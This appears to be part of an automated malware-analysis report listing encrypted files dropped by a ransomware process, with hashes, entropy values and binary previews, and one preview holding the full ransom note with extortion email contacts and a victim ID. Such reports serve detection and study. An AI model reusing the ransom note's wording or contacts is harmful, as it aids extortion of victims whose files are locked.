                                                                                                    Preview:.......w.E.rv.~i..w$.O...V.....,.. .n.(..1..V=.m..e TY..o.?..1........m...:.I.d/Y..(....AM.7.;...{7r.R...1.8..$...X...eX.n.4H1q.z#|D.....d...3..#-.X.Al...lw......~...M..i.+.},Uz.7....._.y.7..DwE.A-b......YP.0..U.hh.Y...3..f;..1J..1L..2.;...8.N..vo..e.8'...Z.W.:q).....4.?........<....U....<f.U....$IX.S.6h.V$..&..V.._..yq.O...4....{~N.;...)...,:~.\.(\.6.RJ..d..5...F~.D.A....|.......V@KP.0.....6B..+e.^...}Y.7..)....X.H!&b'j.....UZl.F.j.+\...N....].e.^1.......)p-...t.eU...~.F...1.*.x-.....L.^..G.[.68l...oj.jr.....XD...1m.E...w.lM'../..0.1fk.....~.6.*..:}..)...-.X..DY.Y.0.9....X.....4Md2.Q.e(Qs...D...1~.^\s..m.......jD}..1i.0d.?%}.....Fs......s......../......*....1.L7`.@.a:....U3-..H../.u.^S...(<=.uM(l).@3.F.Y...A.Xds..O.@....y... ..p...U.......h....!u.s.5p*...7..D%[f.<..eY..@.._.d...<..".....O.f...Mfr.Fe....lO%6...C...{..?.<.....5.y?%.EC...W.7.6.:.5jj.&..rY..N...C...+...>..c.bXkw.1...b.?...2.UW5.t.p;97..*...u...[.......ue2p.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8430906568377665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:scSAlUdD8qnkq8wes2wlXSVeJxOght13cf37RTvOnvwC7o4+S2A7atI8H:scADyq6s2zeJjg317DC7o4gEad
                                                                                                    MD5:69A6F3BBA53F5B97519DFEC7C7EE6886
                                                                                                    SHA1:AEB90922270D6EE8F5B8F255FC838B34901467A2
                                                                                                    SHA-256:C0FBCB452C61452D80C9D69E5DD1FB21287FA00E67B27C40C1104BCEDF0A7D44
                                                                                                    SHA-512:B4B3EE7949954C25322DDAB76E4569C496B358F17F9222D2813CE15EE9D8F19692126305FD3C8B70B0FD4D72FC3121506AA8CCEED8E00ABC7F334DC12D734519
                                                                                                    Malicious:false
                                                                                                    Preview:.......w.E.rv.~i..w$.O...V.....,.. .n.(..1..V=.m..e TY..o.?..1........m...:.I.d/Y..(....AM.7.;...{7r.R...1.8..$...X...eX.n.4H1q.z#|D.....d...3..#-.X.Al...lw......~...M..i.+.},Uz.7....._.y.7..DwE.A-b......YP.0..U.hh.Y...3..f;..1J..1L..2.;...8.N..vo..e.8'...Z.W.:q).....4.?........<....U....<f.U....$IX.S.6h.V$..&..V.._..yq.O...4....{~N.;...)...,:~.\.(\.6.RJ..d..5...F~.D.A....|.......V@KP.0.....6B..+e.^...}Y.7..)....X.H!&b'j.....UZl.F.j.+\...N....].e.^1.......)p-...t.eU...~.F...1.*.x-.....L.^..G.[.68l...oj.jr.....XD...1m.E...w.lM'../..0.1fk.....~.6.*..:}..)...-.X..DY.Y.0.9....X.....4Md2.Q.e(Qs...D...1~.^\s..m.......jD}..1i.0d.?%}.....Fs......s......../......*....1.L7`.@.a:....U3-..H../.u.^S...(<=.uM(l).@3.F.Y...A.Xds..O.@....y... ..p...U.......h....!u.s.5p*...7..D%[f.<..eY..@.._.d...<..".....O.f...Mfr.Fe....lO%6...C...{..?.<.....5.y?%.EC...W.7.6.:.5jj.&..rY..N...C...+...>..c.bXkw.1...b.?...2.UW5.t.p;97..*...u...[.......ue2p.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8442797082568845
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tkPXA2YRArG/gio0n04Nu5ZoX5RinijKy1vOSEI7EV:O4tyG/nn04NuP6Mi+yQZX
                                                                                                    MD5:7079EAF60CF915016AB19A5825F1DF79
                                                                                                    SHA1:6B9FF5F13C0249268481729AED668163D911437E
                                                                                                    SHA-256:7B37B65F7E46149A0588CF4CC245521F831AC9BD00ED7E653126C124253EDF41
                                                                                                    SHA-512:A337E30631501EBD91C1915E0F658DB050D7DA836E2341CCBF2E90D59B4224AB74DFD10611D979A2A070824ADDC1FD1FB99B8E2F1EFD6DF14A6BE8A53B6F8519
                                                                                                    Malicious:false
                                                                                                    Preview:wQ........Z...N..g...z.../yC.....A.RE]Q.]...u<S.....$X>Zt...r\{..Aj.~..,.;l.q..t5.......;m....p<..k.4 _..2.Q".I....X....E.V.'.....A.]Jb.5..Eh.y..y...w..6...c[.MHs...c...l...~..OS....HXR6mab`}.F..d:@.1.^zg..&..[.{~~)|..K......"j3&0..f.O/...d......e.u51..K..E....>*.k...:,....sqg,;.z|J...me.Y.&.....Z..%QJg.P.V.{.`...fn#..~&..&.z.h%..0.u...V..`....R......d.(.O1.r.!.y5Q....."....2~Z......A...ra...b.}.asvv.B.X...x...1.R...X(.........u...g..9.]<..H.T..H.B.=..:.TR.......l.\..<.....B.....v..l|d.m0....S.7.F.1..lA..p....pa.......>Q..`3a...T[?.FX........_.....z_..2}.T...y........Q.a...7V.#..2........uK9Q.5.7.......$w..D....F..h.0..E....$.e..nD:.........U...)T"S#}./....{..W"...3.r(.9'.IHh@....B.o4Fm4..{........i...nAk..WED...N....R.ZFc......n...s9{...qY.....=..g3g.....r.].X..d.'..d!gA........"/-....p...G..I.&.t..[.-..}=.'D.0q.;."%........H:-*.....v..k..$....c#y.'B.s..~.......^i.....b(..@1....u..j..6..\~X..\.".G.8dk.cc......^....o.n16.G.B...()..._Nxj.....qo....E...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8442797082568845
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tkPXA2YRArG/gio0n04Nu5ZoX5RinijKy1vOSEI7EV:O4tyG/nn04NuP6Mi+yQZX
                                                                                                    MD5:7079EAF60CF915016AB19A5825F1DF79
                                                                                                    SHA1:6B9FF5F13C0249268481729AED668163D911437E
                                                                                                    SHA-256:7B37B65F7E46149A0588CF4CC245521F831AC9BD00ED7E653126C124253EDF41
                                                                                                    SHA-512:A337E30631501EBD91C1915E0F658DB050D7DA836E2341CCBF2E90D59B4224AB74DFD10611D979A2A070824ADDC1FD1FB99B8E2F1EFD6DF14A6BE8A53B6F8519
                                                                                                    Malicious:false
                                                                                                    Preview:wQ........Z...N..g...z.../yC.....A.RE]Q.]...u<S.....$X>Zt...r\{..Aj.~..,.;l.q..t5.......;m....p<..k.4 _..2.Q".I....X....E.V.'.....A.]Jb.5..Eh.y..y...w..6...c[.MHs...c...l...~..OS....HXR6mab`}.F..d:@.1.^zg..&..[.{~~)|..K......"j3&0..f.O/...d......e.u51..K..E....>*.k...:,....sqg,;.z|J...me.Y.&.....Z..%QJg.P.V.{.`...fn#..~&..&.z.h%..0.u...V..`....R......d.(.O1.r.!.y5Q....."....2~Z......A...ra...b.}.asvv.B.X...x...1.R...X(.........u...g..9.]<..H.T..H.B.=..:.TR.......l.\..<.....B.....v..l|d.m0....S.7.F.1..lA..p....pa.......>Q..`3a...T[?.FX........_.....z_..2}.T...y........Q.a...7V.#..2........uK9Q.5.7.......$w..D....F..h.0..E....$.e..nD:.........U...)T"S#}./....{..W"...3.r(.9'.IHh@....B.o4Fm4..{........i...nAk..WED...N....R.ZFc......n...s9{...qY.....=..g3g.....r.].X..d.'..d!gA........"/-....p...G..I.&.t..[.-..}=.'D.0q.;."%........H:-*.....v..k..$....c#y.'B.s..~.......^i.....b(..@1....u..j..6..\~X..\.".G.8dk.cc......^....o.n16.G.B...()..._Nxj.....qo....E...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.864935766000018
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gYimv8B1THEBIlCzqgEdwYoBoJ4PL6UYxtxLFtjh1/6CgHEROBlB4mYP:DjE/dl8qBdoBoJsL6U67jz/zQEkzB4vP
                                                                                                    MD5:7A42D87326E31177C09377E252C6D998
                                                                                                    SHA1:1A9AE3A6A68ECFFDC6C588B9D011E904ACFE895C
                                                                                                    SHA-256:F58B0C5D18AE89EF29E3A655D55952F78CDABCD2FD78D1A3F0F34CB58256E161
                                                                                                    SHA-512:F2F55D16A235913AEF1CF87E6C51F0859FE3E8A79BB34FCAF4CE36F497DBD9C7CD253C35EBB55A69E8EAF86164BE38FC163E8EA56D4BABCEC9612594C4C51AC4
                                                                                                    Malicious:false
                                                                                                    Preview:e.....f..m.a%....qi..]:#r_...X..V..1....W.-...c..?.....-6...L..5.+...n.....v..M..wl..DTm...=qQ-.....2.T.S.}....1.?(.....O...V...~x6...[. ........&&1.....m.(|..s.PTR..R*...".....,.Z.>.0H....0.VM..[.;{.5vN../n.....h8.H.......WPP.VY........M.yDri./...,@@}.w...0..-.......m. &LQ..@....VE.B...(#2^K9.V..D(.....nw.<....F;...8.tI..:Z..k95..Y..NA2...B....?%y.9...Vfs..0.AC....."...*.......R.........C.qp:7"t..:d.*.D.#-.....S.C.Y.'...5.0...$ttL.;...O.$..?...3..;].....0....E...!..G.*GDp1".#j..X..b..<6ZA)4%..<.8q..+..?...7.m..Jb..Y......././.. 07Hs........uI.cF...n.|....t.'e.,..b..T....!O.t.1.t]F.....>....*U.....=A.G./..-..hh.2._..0.0x.#....@..r.C}.....=./..^..6...|.W.?....:.Q....<.`R./.O..S.C.............W.{.3.8... ..C.i...p6.....vO..?......uZ...|....e.ps~C.896.pP.x..4..+.\.. n....K.{].....C%m^$....Z.....+@........D.....X%B.....eh...p.0.g...n....x%.^"g...]..a.7.\..'.3r.. .!..U*..:...&QS.........=F.......\.).Kd.E....S.....N@.....%... .
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.864935766000018
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:gYimv8B1THEBIlCzqgEdwYoBoJ4PL6UYxtxLFtjh1/6CgHEROBlB4mYP:DjE/dl8qBdoBoJsL6U67jz/zQEkzB4vP
                                                                                                    MD5:7A42D87326E31177C09377E252C6D998
                                                                                                    SHA1:1A9AE3A6A68ECFFDC6C588B9D011E904ACFE895C
                                                                                                    SHA-256:F58B0C5D18AE89EF29E3A655D55952F78CDABCD2FD78D1A3F0F34CB58256E161
                                                                                                    SHA-512:F2F55D16A235913AEF1CF87E6C51F0859FE3E8A79BB34FCAF4CE36F497DBD9C7CD253C35EBB55A69E8EAF86164BE38FC163E8EA56D4BABCEC9612594C4C51AC4
                                                                                                    Malicious:false
                                                                                                    Preview:e.....f..m.a%....qi..]:#r_...X..V..1....W.-...c..?.....-6...L..5.+...n.....v..M..wl..DTm...=qQ-.....2.T.S.}....1.?(.....O...V...~x6...[. ........&&1.....m.(|..s.PTR..R*...".....,.Z.>.0H....0.VM..[.;{.5vN../n.....h8.H.......WPP.VY........M.yDri./...,@@}.w...0..-.......m. &LQ..@....VE.B...(#2^K9.V..D(.....nw.<....F;...8.tI..:Z..k95..Y..NA2...B....?%y.9...Vfs..0.AC....."...*.......R.........C.qp:7"t..:d.*.D.#-.....S.C.Y.'...5.0...$ttL.;...O.$..?...3..;].....0....E...!..G.*GDp1".#j..X..b..<6ZA)4%..<.8q..+..?...7.m..Jb..Y......././.. 07Hs........uI.cF...n.|....t.'e.,..b..T....!O.t.1.t]F.....>....*U.....=A.G./..-..hh.2._..0.0x.#....@..r.C}.....=./..^..6...|.W.?....:.Q....<.`R./.O..S.C.............W.{.3.8... ..C.i...p6.....vO..?......uZ...|....e.ps~C.896.pP.x..4..+.\.. n....K.{].....C%m^$....Z.....+@........D.....X%B.....eh...p.0.g...n....x%.^"g...]..a.7.\..'.3r.. .!..U*..:...&QS.........=F.......\.).Kd.E....S.....N@.....%... .
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.858277228140458
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:aqRxhJsTSjKCGGIIOHP1HNPLPgQF9Voa3SUjuU8ouInamk:a+h+T3vIwzgQ/VSUaUF65
                                                                                                    MD5:78BAA3E7906FA4DE7F484CBDF816C88E
                                                                                                    SHA1:69B023DC6BD4792C4E52B45D235BD56A3E826DF6
                                                                                                    SHA-256:96ACA4E09B4072A8576D17B25993FD12888B498B1A9C8C498F32F6E1391F5236
                                                                                                    SHA-512:30751D060749796415F3C5A60D9221348B1B9C5963549E2029BA4E7FC4DA3132CC371C0DECC7B0779019749D9128D695913D6E09907A03843BC145DCDFE1D59E
                                                                                                    Malicious:false
                                                                                                    Preview:~lUa.I.dJ.|....A.-Z.` .b..a.+b......].Y....3_:........Iq....T.L.pUD..z.-.3..1%.2....zf|h[..$I_.d.].H(3}..E*Q.Z....Y...K...>3R .......rd..../.E&..&.5h6J`1.......F.....R.S5B[.......#.1.....6e.t?X`.......i....5..E...P....r.?.....Bv.y.UpI ....{...bi.G..XL?..BQtU/>^:.?x.~.."...q..o.,....}... H."$.t....#.GJ.b.k..p...j...L...:....8. .x.EE..2.]!..I..D....l.-.C...q8.....I...9.w.~+...V,..o.>..d...F:"..............$..E...|.Y.o...!....4...@....QH.V..q...L6M...T.....|t.....G..WJ...4...+.;.6|..."....9!.".-.o./.r7...t..J..E\....>..t.I.~.h:....m...'.. ....`0r....S-}....6.B.'_....!.....*..O.....hj..~.G....Q}.lo.Lw......+Yn....g%..`.AT.6../...#B..3 ].c..a.a........x{>.o'.D.I+.........R.......B.Q?..n........#E..... .N..!...m.......8.P.8,.K.....C@.Xz..1o...3A]...865`..e.......5a?.......,wd......gG*q..O._..Nl.....m.......p..xs:%...........T......S.p.Y....9..PS]...|.f..V>C..AF...UH?....HA=md...7R67....+*.+$TD...8..|.jip.....S[..u4/..H....>....r..r...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.858277228140458
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:aqRxhJsTSjKCGGIIOHP1HNPLPgQF9Voa3SUjuU8ouInamk:a+h+T3vIwzgQ/VSUaUF65
                                                                                                    MD5:78BAA3E7906FA4DE7F484CBDF816C88E
                                                                                                    SHA1:69B023DC6BD4792C4E52B45D235BD56A3E826DF6
                                                                                                    SHA-256:96ACA4E09B4072A8576D17B25993FD12888B498B1A9C8C498F32F6E1391F5236
                                                                                                    SHA-512:30751D060749796415F3C5A60D9221348B1B9C5963549E2029BA4E7FC4DA3132CC371C0DECC7B0779019749D9128D695913D6E09907A03843BC145DCDFE1D59E
                                                                                                    Malicious:false
                                                                                                    Preview:~lUa.I.dJ.|....A.-Z.` .b..a.+b......].Y....3_:........Iq....T.L.pUD..z.-.3..1%.2....zf|h[..$I_.d.].H(3}..E*Q.Z....Y...K...>3R .......rd..../.E&..&.5h6J`1.......F.....R.S5B[.......#.1.....6e.t?X`.......i....5..E...P....r.?.....Bv.y.UpI ....{...bi.G..XL?..BQtU/>^:.?x.~.."...q..o.,....}... H."$.t....#.GJ.b.k..p...j...L...:....8. .x.EE..2.]!..I..D....l.-.C...q8.....I...9.w.~+...V,..o.>..d...F:"..............$..E...|.Y.o...!....4...@....QH.V..q...L6M...T.....|t.....G..WJ...4...+.;.6|..."....9!.".-.o./.r7...t..J..E\....>..t.I.~.h:....m...'.. ....`0r....S-}....6.B.'_....!.....*..O.....hj..~.G....Q}.lo.Lw......+Yn....g%..`.AT.6../...#B..3 ].c..a.a........x{>.o'.D.I+.........R.......B.Q?..n........#E..... .N..!...m.......8.P.8,.K.....C@.Xz..1o...3A]...865`..e.......5a?.......,wd......gG*q..O._..Nl.....m.......p..xs:%...........T......S.p.Y....9..PS]...|.f..V>C..AF...UH?....HA=md...7R67....+*.+$TD...8..|.jip.....S[..u4/..H....>....r..r...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844002742756865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3+b2wjuI56kizwk2/Sl9biiDLt38tMI0wb0tefg49r6zkwopJjrb:3+b2EuI563wkOA92i138Zdf99r6/opJL
                                                                                                    MD5:458E0F43146204A2B87F849A6871E559
                                                                                                    SHA1:4C45080D1090D5D4F313FAC0E2D0094CA3E19B00
                                                                                                    SHA-256:B58B9E31AE5E278DE25B113B50E39B8BD099C4E5A62738A65CB54AABC53060DD
                                                                                                    SHA-512:994B26D87374382E8DBA1C3305EB880472321DA749E9514A2D99A4F6C7CF2CE6254D5D2C5795BA5BF865247D7E95B41F483D5FEBD0E32B0BB932A1B7AAED1752
                                                                                                    Malicious:false
                                                                                                    Preview:.V..;..J..w.=t0.K...U..............LJ......T........5Lr.fH.]....y d.....r....v..^.W_s&~...y...d..CW,.U.)r.Tr$..hW..."....2@..)U#5...u7A...j.....fV...a.....uQ...#..?M._.X6...u.(.4......o.f.{./=..o5....j.....M....{..F}........#f...a...8,...N..z.e...%..J.{.<.6..".3<.S....>....psCd=E.C=.:.<...M....t.^.P.....<r...i..a..u+.l.,..S..DN.?g.p....s/c.6X.^......I^..`.&~.^p.@#.h0.in.C(.Y.U.v..$...\... 'V..ZCx...."V'G...^.).a...w.p.^......A.J.z&XC.6./....L...x|].&..u:{p.O(..!'....k...N..^...=.0.Go...+)J..O%.&.9..x..2.A.X!...C..J.....oq=....n..rH.'..`...z...i(A...... ../>..>....e.."..nm..F....:...[.W.d..".^:.9..:......#..0.X.b#.`....}.S.;...pW..>v.mF..y.p.*..Nh..d.W.Z7...\..Md....w.g>....?.t.#..H..>?.c.i&.`....w,.G....j.m=....{|.drZ4...3gj.#j.-c.z....dr.|>.X~.W..P'.o.c.}.......b.G.).4.fJ.@...4.`5m.........i..gHf....rG}......s..;....t;..m.).!'.%..'O.d...4]i.9..h.'..Ez....C9`|~...Q..."...:.j.Q.[h6n.Ew$6..L...../Y......@2P[#.....J9.UwX.^@..Frr.1...z3..9
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844002742756865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:3+b2wjuI56kizwk2/Sl9biiDLt38tMI0wb0tefg49r6zkwopJjrb:3+b2EuI563wkOA92i138Zdf99r6/opJL
                                                                                                    MD5:458E0F43146204A2B87F849A6871E559
                                                                                                    SHA1:4C45080D1090D5D4F313FAC0E2D0094CA3E19B00
                                                                                                    SHA-256:B58B9E31AE5E278DE25B113B50E39B8BD099C4E5A62738A65CB54AABC53060DD
                                                                                                    SHA-512:994B26D87374382E8DBA1C3305EB880472321DA749E9514A2D99A4F6C7CF2CE6254D5D2C5795BA5BF865247D7E95B41F483D5FEBD0E32B0BB932A1B7AAED1752
                                                                                                    Malicious:false
                                                                                                    Preview:.V..;..J..w.=t0.K...U..............LJ......T........5Lr.fH.]....y d.....r....v..^.W_s&~...y...d..CW,.U.)r.Tr$..hW..."....2@..)U#5...u7A...j.....fV...a.....uQ...#..?M._.X6...u.(.4......o.f.{./=..o5....j.....M....{..F}........#f...a...8,...N..z.e...%..J.{.<.6..".3<.S....>....psCd=E.C=.:.<...M....t.^.P.....<r...i..a..u+.l.,..S..DN.?g.p....s/c.6X.^......I^..`.&~.^p.@#.h0.in.C(.Y.U.v..$...\... 'V..ZCx...."V'G...^.).a...w.p.^......A.J.z&XC.6./....L...x|].&..u:{p.O(..!'....k...N..^...=.0.Go...+)J..O%.&.9..x..2.A.X!...C..J.....oq=....n..rH.'..`...z...i(A...... ../>..>....e.."..nm..F....:...[.W.d..".^:.9..:......#..0.X.b#.`....}.S.;...pW..>v.mF..y.p.*..Nh..d.W.Z7...\..Md....w.g>....?.t.#..H..>?.c.i&.`....w,.G....j.m=....{|.drZ4...3gj.#j.-c.z....dr.|>.X~.W..P'.o.c.}.......b.G.).4.fJ.@...4.`5m.........i..gHf....rG}......s..;....t;..m.).!'.%..'O.d...4]i.9..h.'..Ez....C9`|~...Q..."...:.j.Q.[h6n.Ew$6..L...../Y......@2P[#.....J9.UwX.^@..Frr.1...z3..9
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8446128368895005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cj6RAXygHIIJb5QFSdOeRG3zcFDJxZNBKP+t1mEtkcInagR/HYeuf2Q2:XArHI85tVs3oZttgEuDnaLeXQ2
                                                                                                    MD5:D05A1BABB06C784C389EF35FD25A0D94
                                                                                                    SHA1:7A08A787054B6B9E8193FD94C3F71A9197980AC6
                                                                                                    SHA-256:942D2934420C77CD933FBF1A7A34E0C61EE7A2146B7FC4523EE42D775CA90C07
                                                                                                    SHA-512:762025ABD3F22CF1B89B8F91BA6921EFD068894180779D1C0EBCFDD76D46E0FA33A263AAE09106A68542A2B58DA44CE57046408B288C52F3FB011275721C623E
                                                                                                    Malicious:false
                                                                                                    Preview:.u%.._.......t......v.S2.....0.........H..A...uW..\.........$..b.MupI.f3..%.......H].^..9.......}As.?.#..%G..j....j|s`.r....{U.8.8..z..\.u......w....T.....NtRM"r|.@....r.)..o..%..s.C".x...4.&.>..G.....Z.j...cx"......y.....'2s......!.x........?q...5My. .&P.xtH.].|....1.^z.....m....#ot..H..:F.YC..n.O[...5...i.z.........A...Pr.F{...V.#<.$-*(...W..f..g.x0.7.[..@v...W.N....n....5.f.9.s.4S..E....6...`_d.!..a...$.2..I}~.b..]...$.s.@W2n....}...ZP.C.O..>....v....R/..D$t....^e...g...Tl,2.&xG..0..M.S.<......M.........gl...M..g..` ....qzl...E.z......>Q...z.....u.}..oj...Q.p1...u..G.1(.U.W.@)..I.w.c..>...\vv..d......f./..DT`.....#d8.7..=f...}.5......Q5)2.~n$.p.j T.i....J.v.....O...%5....W.7.m.:..}k~..Y.........|n..4C.k.!.z.(..9.......x...dF-."f...w..fO.i#.(.........V....0.... K..^.*`K..,..v....I^.M....`V.../p..r.5\m..y..ue_...J.}S.[.......uku..k.p.h..>...2+t.Uf.....Y...P..k...S+..A..".[.dU...n.k...?/.6......k.........r.YNv......`.#....4......"$<.^.,......S..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8446128368895005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cj6RAXygHIIJb5QFSdOeRG3zcFDJxZNBKP+t1mEtkcInagR/HYeuf2Q2:XArHI85tVs3oZttgEuDnaLeXQ2
                                                                                                    MD5:D05A1BABB06C784C389EF35FD25A0D94
                                                                                                    SHA1:7A08A787054B6B9E8193FD94C3F71A9197980AC6
                                                                                                    SHA-256:942D2934420C77CD933FBF1A7A34E0C61EE7A2146B7FC4523EE42D775CA90C07
                                                                                                    SHA-512:762025ABD3F22CF1B89B8F91BA6921EFD068894180779D1C0EBCFDD76D46E0FA33A263AAE09106A68542A2B58DA44CE57046408B288C52F3FB011275721C623E
                                                                                                    Malicious:false
                                                                                                    Preview:.u%.._.......t......v.S2.....0.........H..A...uW..\.........$..b.MupI.f3..%.......H].^..9.......}As.?.#..%G..j....j|s`.r....{U.8.8..z..\.u......w....T.....NtRM"r|.@....r.)..o..%..s.C".x...4.&.>..G.....Z.j...cx"......y.....'2s......!.x........?q...5My. .&P.xtH.].|....1.^z.....m....#ot..H..:F.YC..n.O[...5...i.z.........A...Pr.F{...V.#<.$-*(...W..f..g.x0.7.[..@v...W.N....n....5.f.9.s.4S..E....6...`_d.!..a...$.2..I}~.b..]...$.s.@W2n....}...ZP.C.O..>....v....R/..D$t....^e...g...Tl,2.&xG..0..M.S.<......M.........gl...M..g..` ....qzl...E.z......>Q...z.....u.}..oj...Q.p1...u..G.1(.U.W.@)..I.w.c..>...\vv..d......f./..DT`.....#d8.7..=f...}.5......Q5)2.~n$.p.j T.i....J.v.....O...%5....W.7.m.:..}k~..Y.........|n..4C.k.!.z.(..9.......x...dF-."f...w..fO.i#.(.........V....0.... K..^.*`K..,..v....I^.M....`V.../p..r.5\m..y..ue_...J.}S.[.......uku..k.p.h..>...2+t.Uf.....Y...P..k...S+..A..".[.dU...n.k...?/.6......k.........r.YNv......`.#....4......"$<.^.,......S..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844865844792679
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:bOXxFyxwlv487NRxdPW8Vw6L6kZeTnCywh+IhXlCy+F3KegeBCscSXT2/LN:qB4sFgTnCywxh1CysFkvSX85
                                                                                                    MD5:CA63EA8BC38A6B7F6B5CBC5D0C03F788
                                                                                                    SHA1:09E666EA75458A60C7EB5BB3C717B1C14D3F82AC
                                                                                                    SHA-256:9EFBD335D6F756E9629BF9CBADB29489E8F945A5CEFFD8FBA426568BE5D9E6D7
                                                                                                    SHA-512:2D0DA3ABEC3D90B55BF949BAFBD8B5D7286577234AFC454C18E1B485092506713D326BBB0D5DE070720E8A3645CB783D76633FB83DCFF2598DEB5F04F4331E72
                                                                                                    Malicious:false
                                                                                                    Preview:s.......ICy._...... c.15.+k.......tU.P<..u.\.R.K...Q...R.w....^.{.t@..!..f.....[......w..R..#.w.y......"A.......k.J.A=.....+......!..5...8(.%~W..^%...Q.e..{....|......V..LwD....)h.LwdCY@......M........U......<eu][.j.|.r]....U..`T...x.ef.....0...Z...") ....z..W =.(jK{V..2.i.q..8.....Z>.5..`.V..NN..t..FC{.Nd.9X.@!z.....,.........1.`).7K..k;.....i.>1f}....o...&.|.y.sy...w..:.7...6......f.-..Kpk.f=.7..l.7=.J3...W.v........Y.......^1>6->...!..]...abqh..S.mT.J/|W^Lf..}Fc...{.M..,.`.r.v..>D..Ry....6.0.r&.pmwY.6.,.4....O....>x..u/.H.C.<......Q....E.!z.8dI.......9..'..8h.z.&.o........aL.9o.G..(...M..1b..-.G$^..x.u...-.a....G..^....5.!...lI...5....<=....Y.).......SZj..d.....iW.-.n..lA....JDj.].W.+@..DpV.p.0..#o._..mbnC..m.{:.jhi..?.PQ.c..b.>T)W..-....nh....,........3z.....bX]..H...+.j>..p.....L2.).U.\...A?..........x..6........el.vFLo...-F>sa..=1S....-....U.d.L./...S..V.l....}T....kY|.K>ZH..ir"qk...'.&grF{v.?.......=.K.%LMa-.......dj........
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.844865844792679
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:bOXxFyxwlv487NRxdPW8Vw6L6kZeTnCywh+IhXlCy+F3KegeBCscSXT2/LN:qB4sFgTnCywxh1CysFkvSX85
                                                                                                    MD5:CA63EA8BC38A6B7F6B5CBC5D0C03F788
                                                                                                    SHA1:09E666EA75458A60C7EB5BB3C717B1C14D3F82AC
                                                                                                    SHA-256:9EFBD335D6F756E9629BF9CBADB29489E8F945A5CEFFD8FBA426568BE5D9E6D7
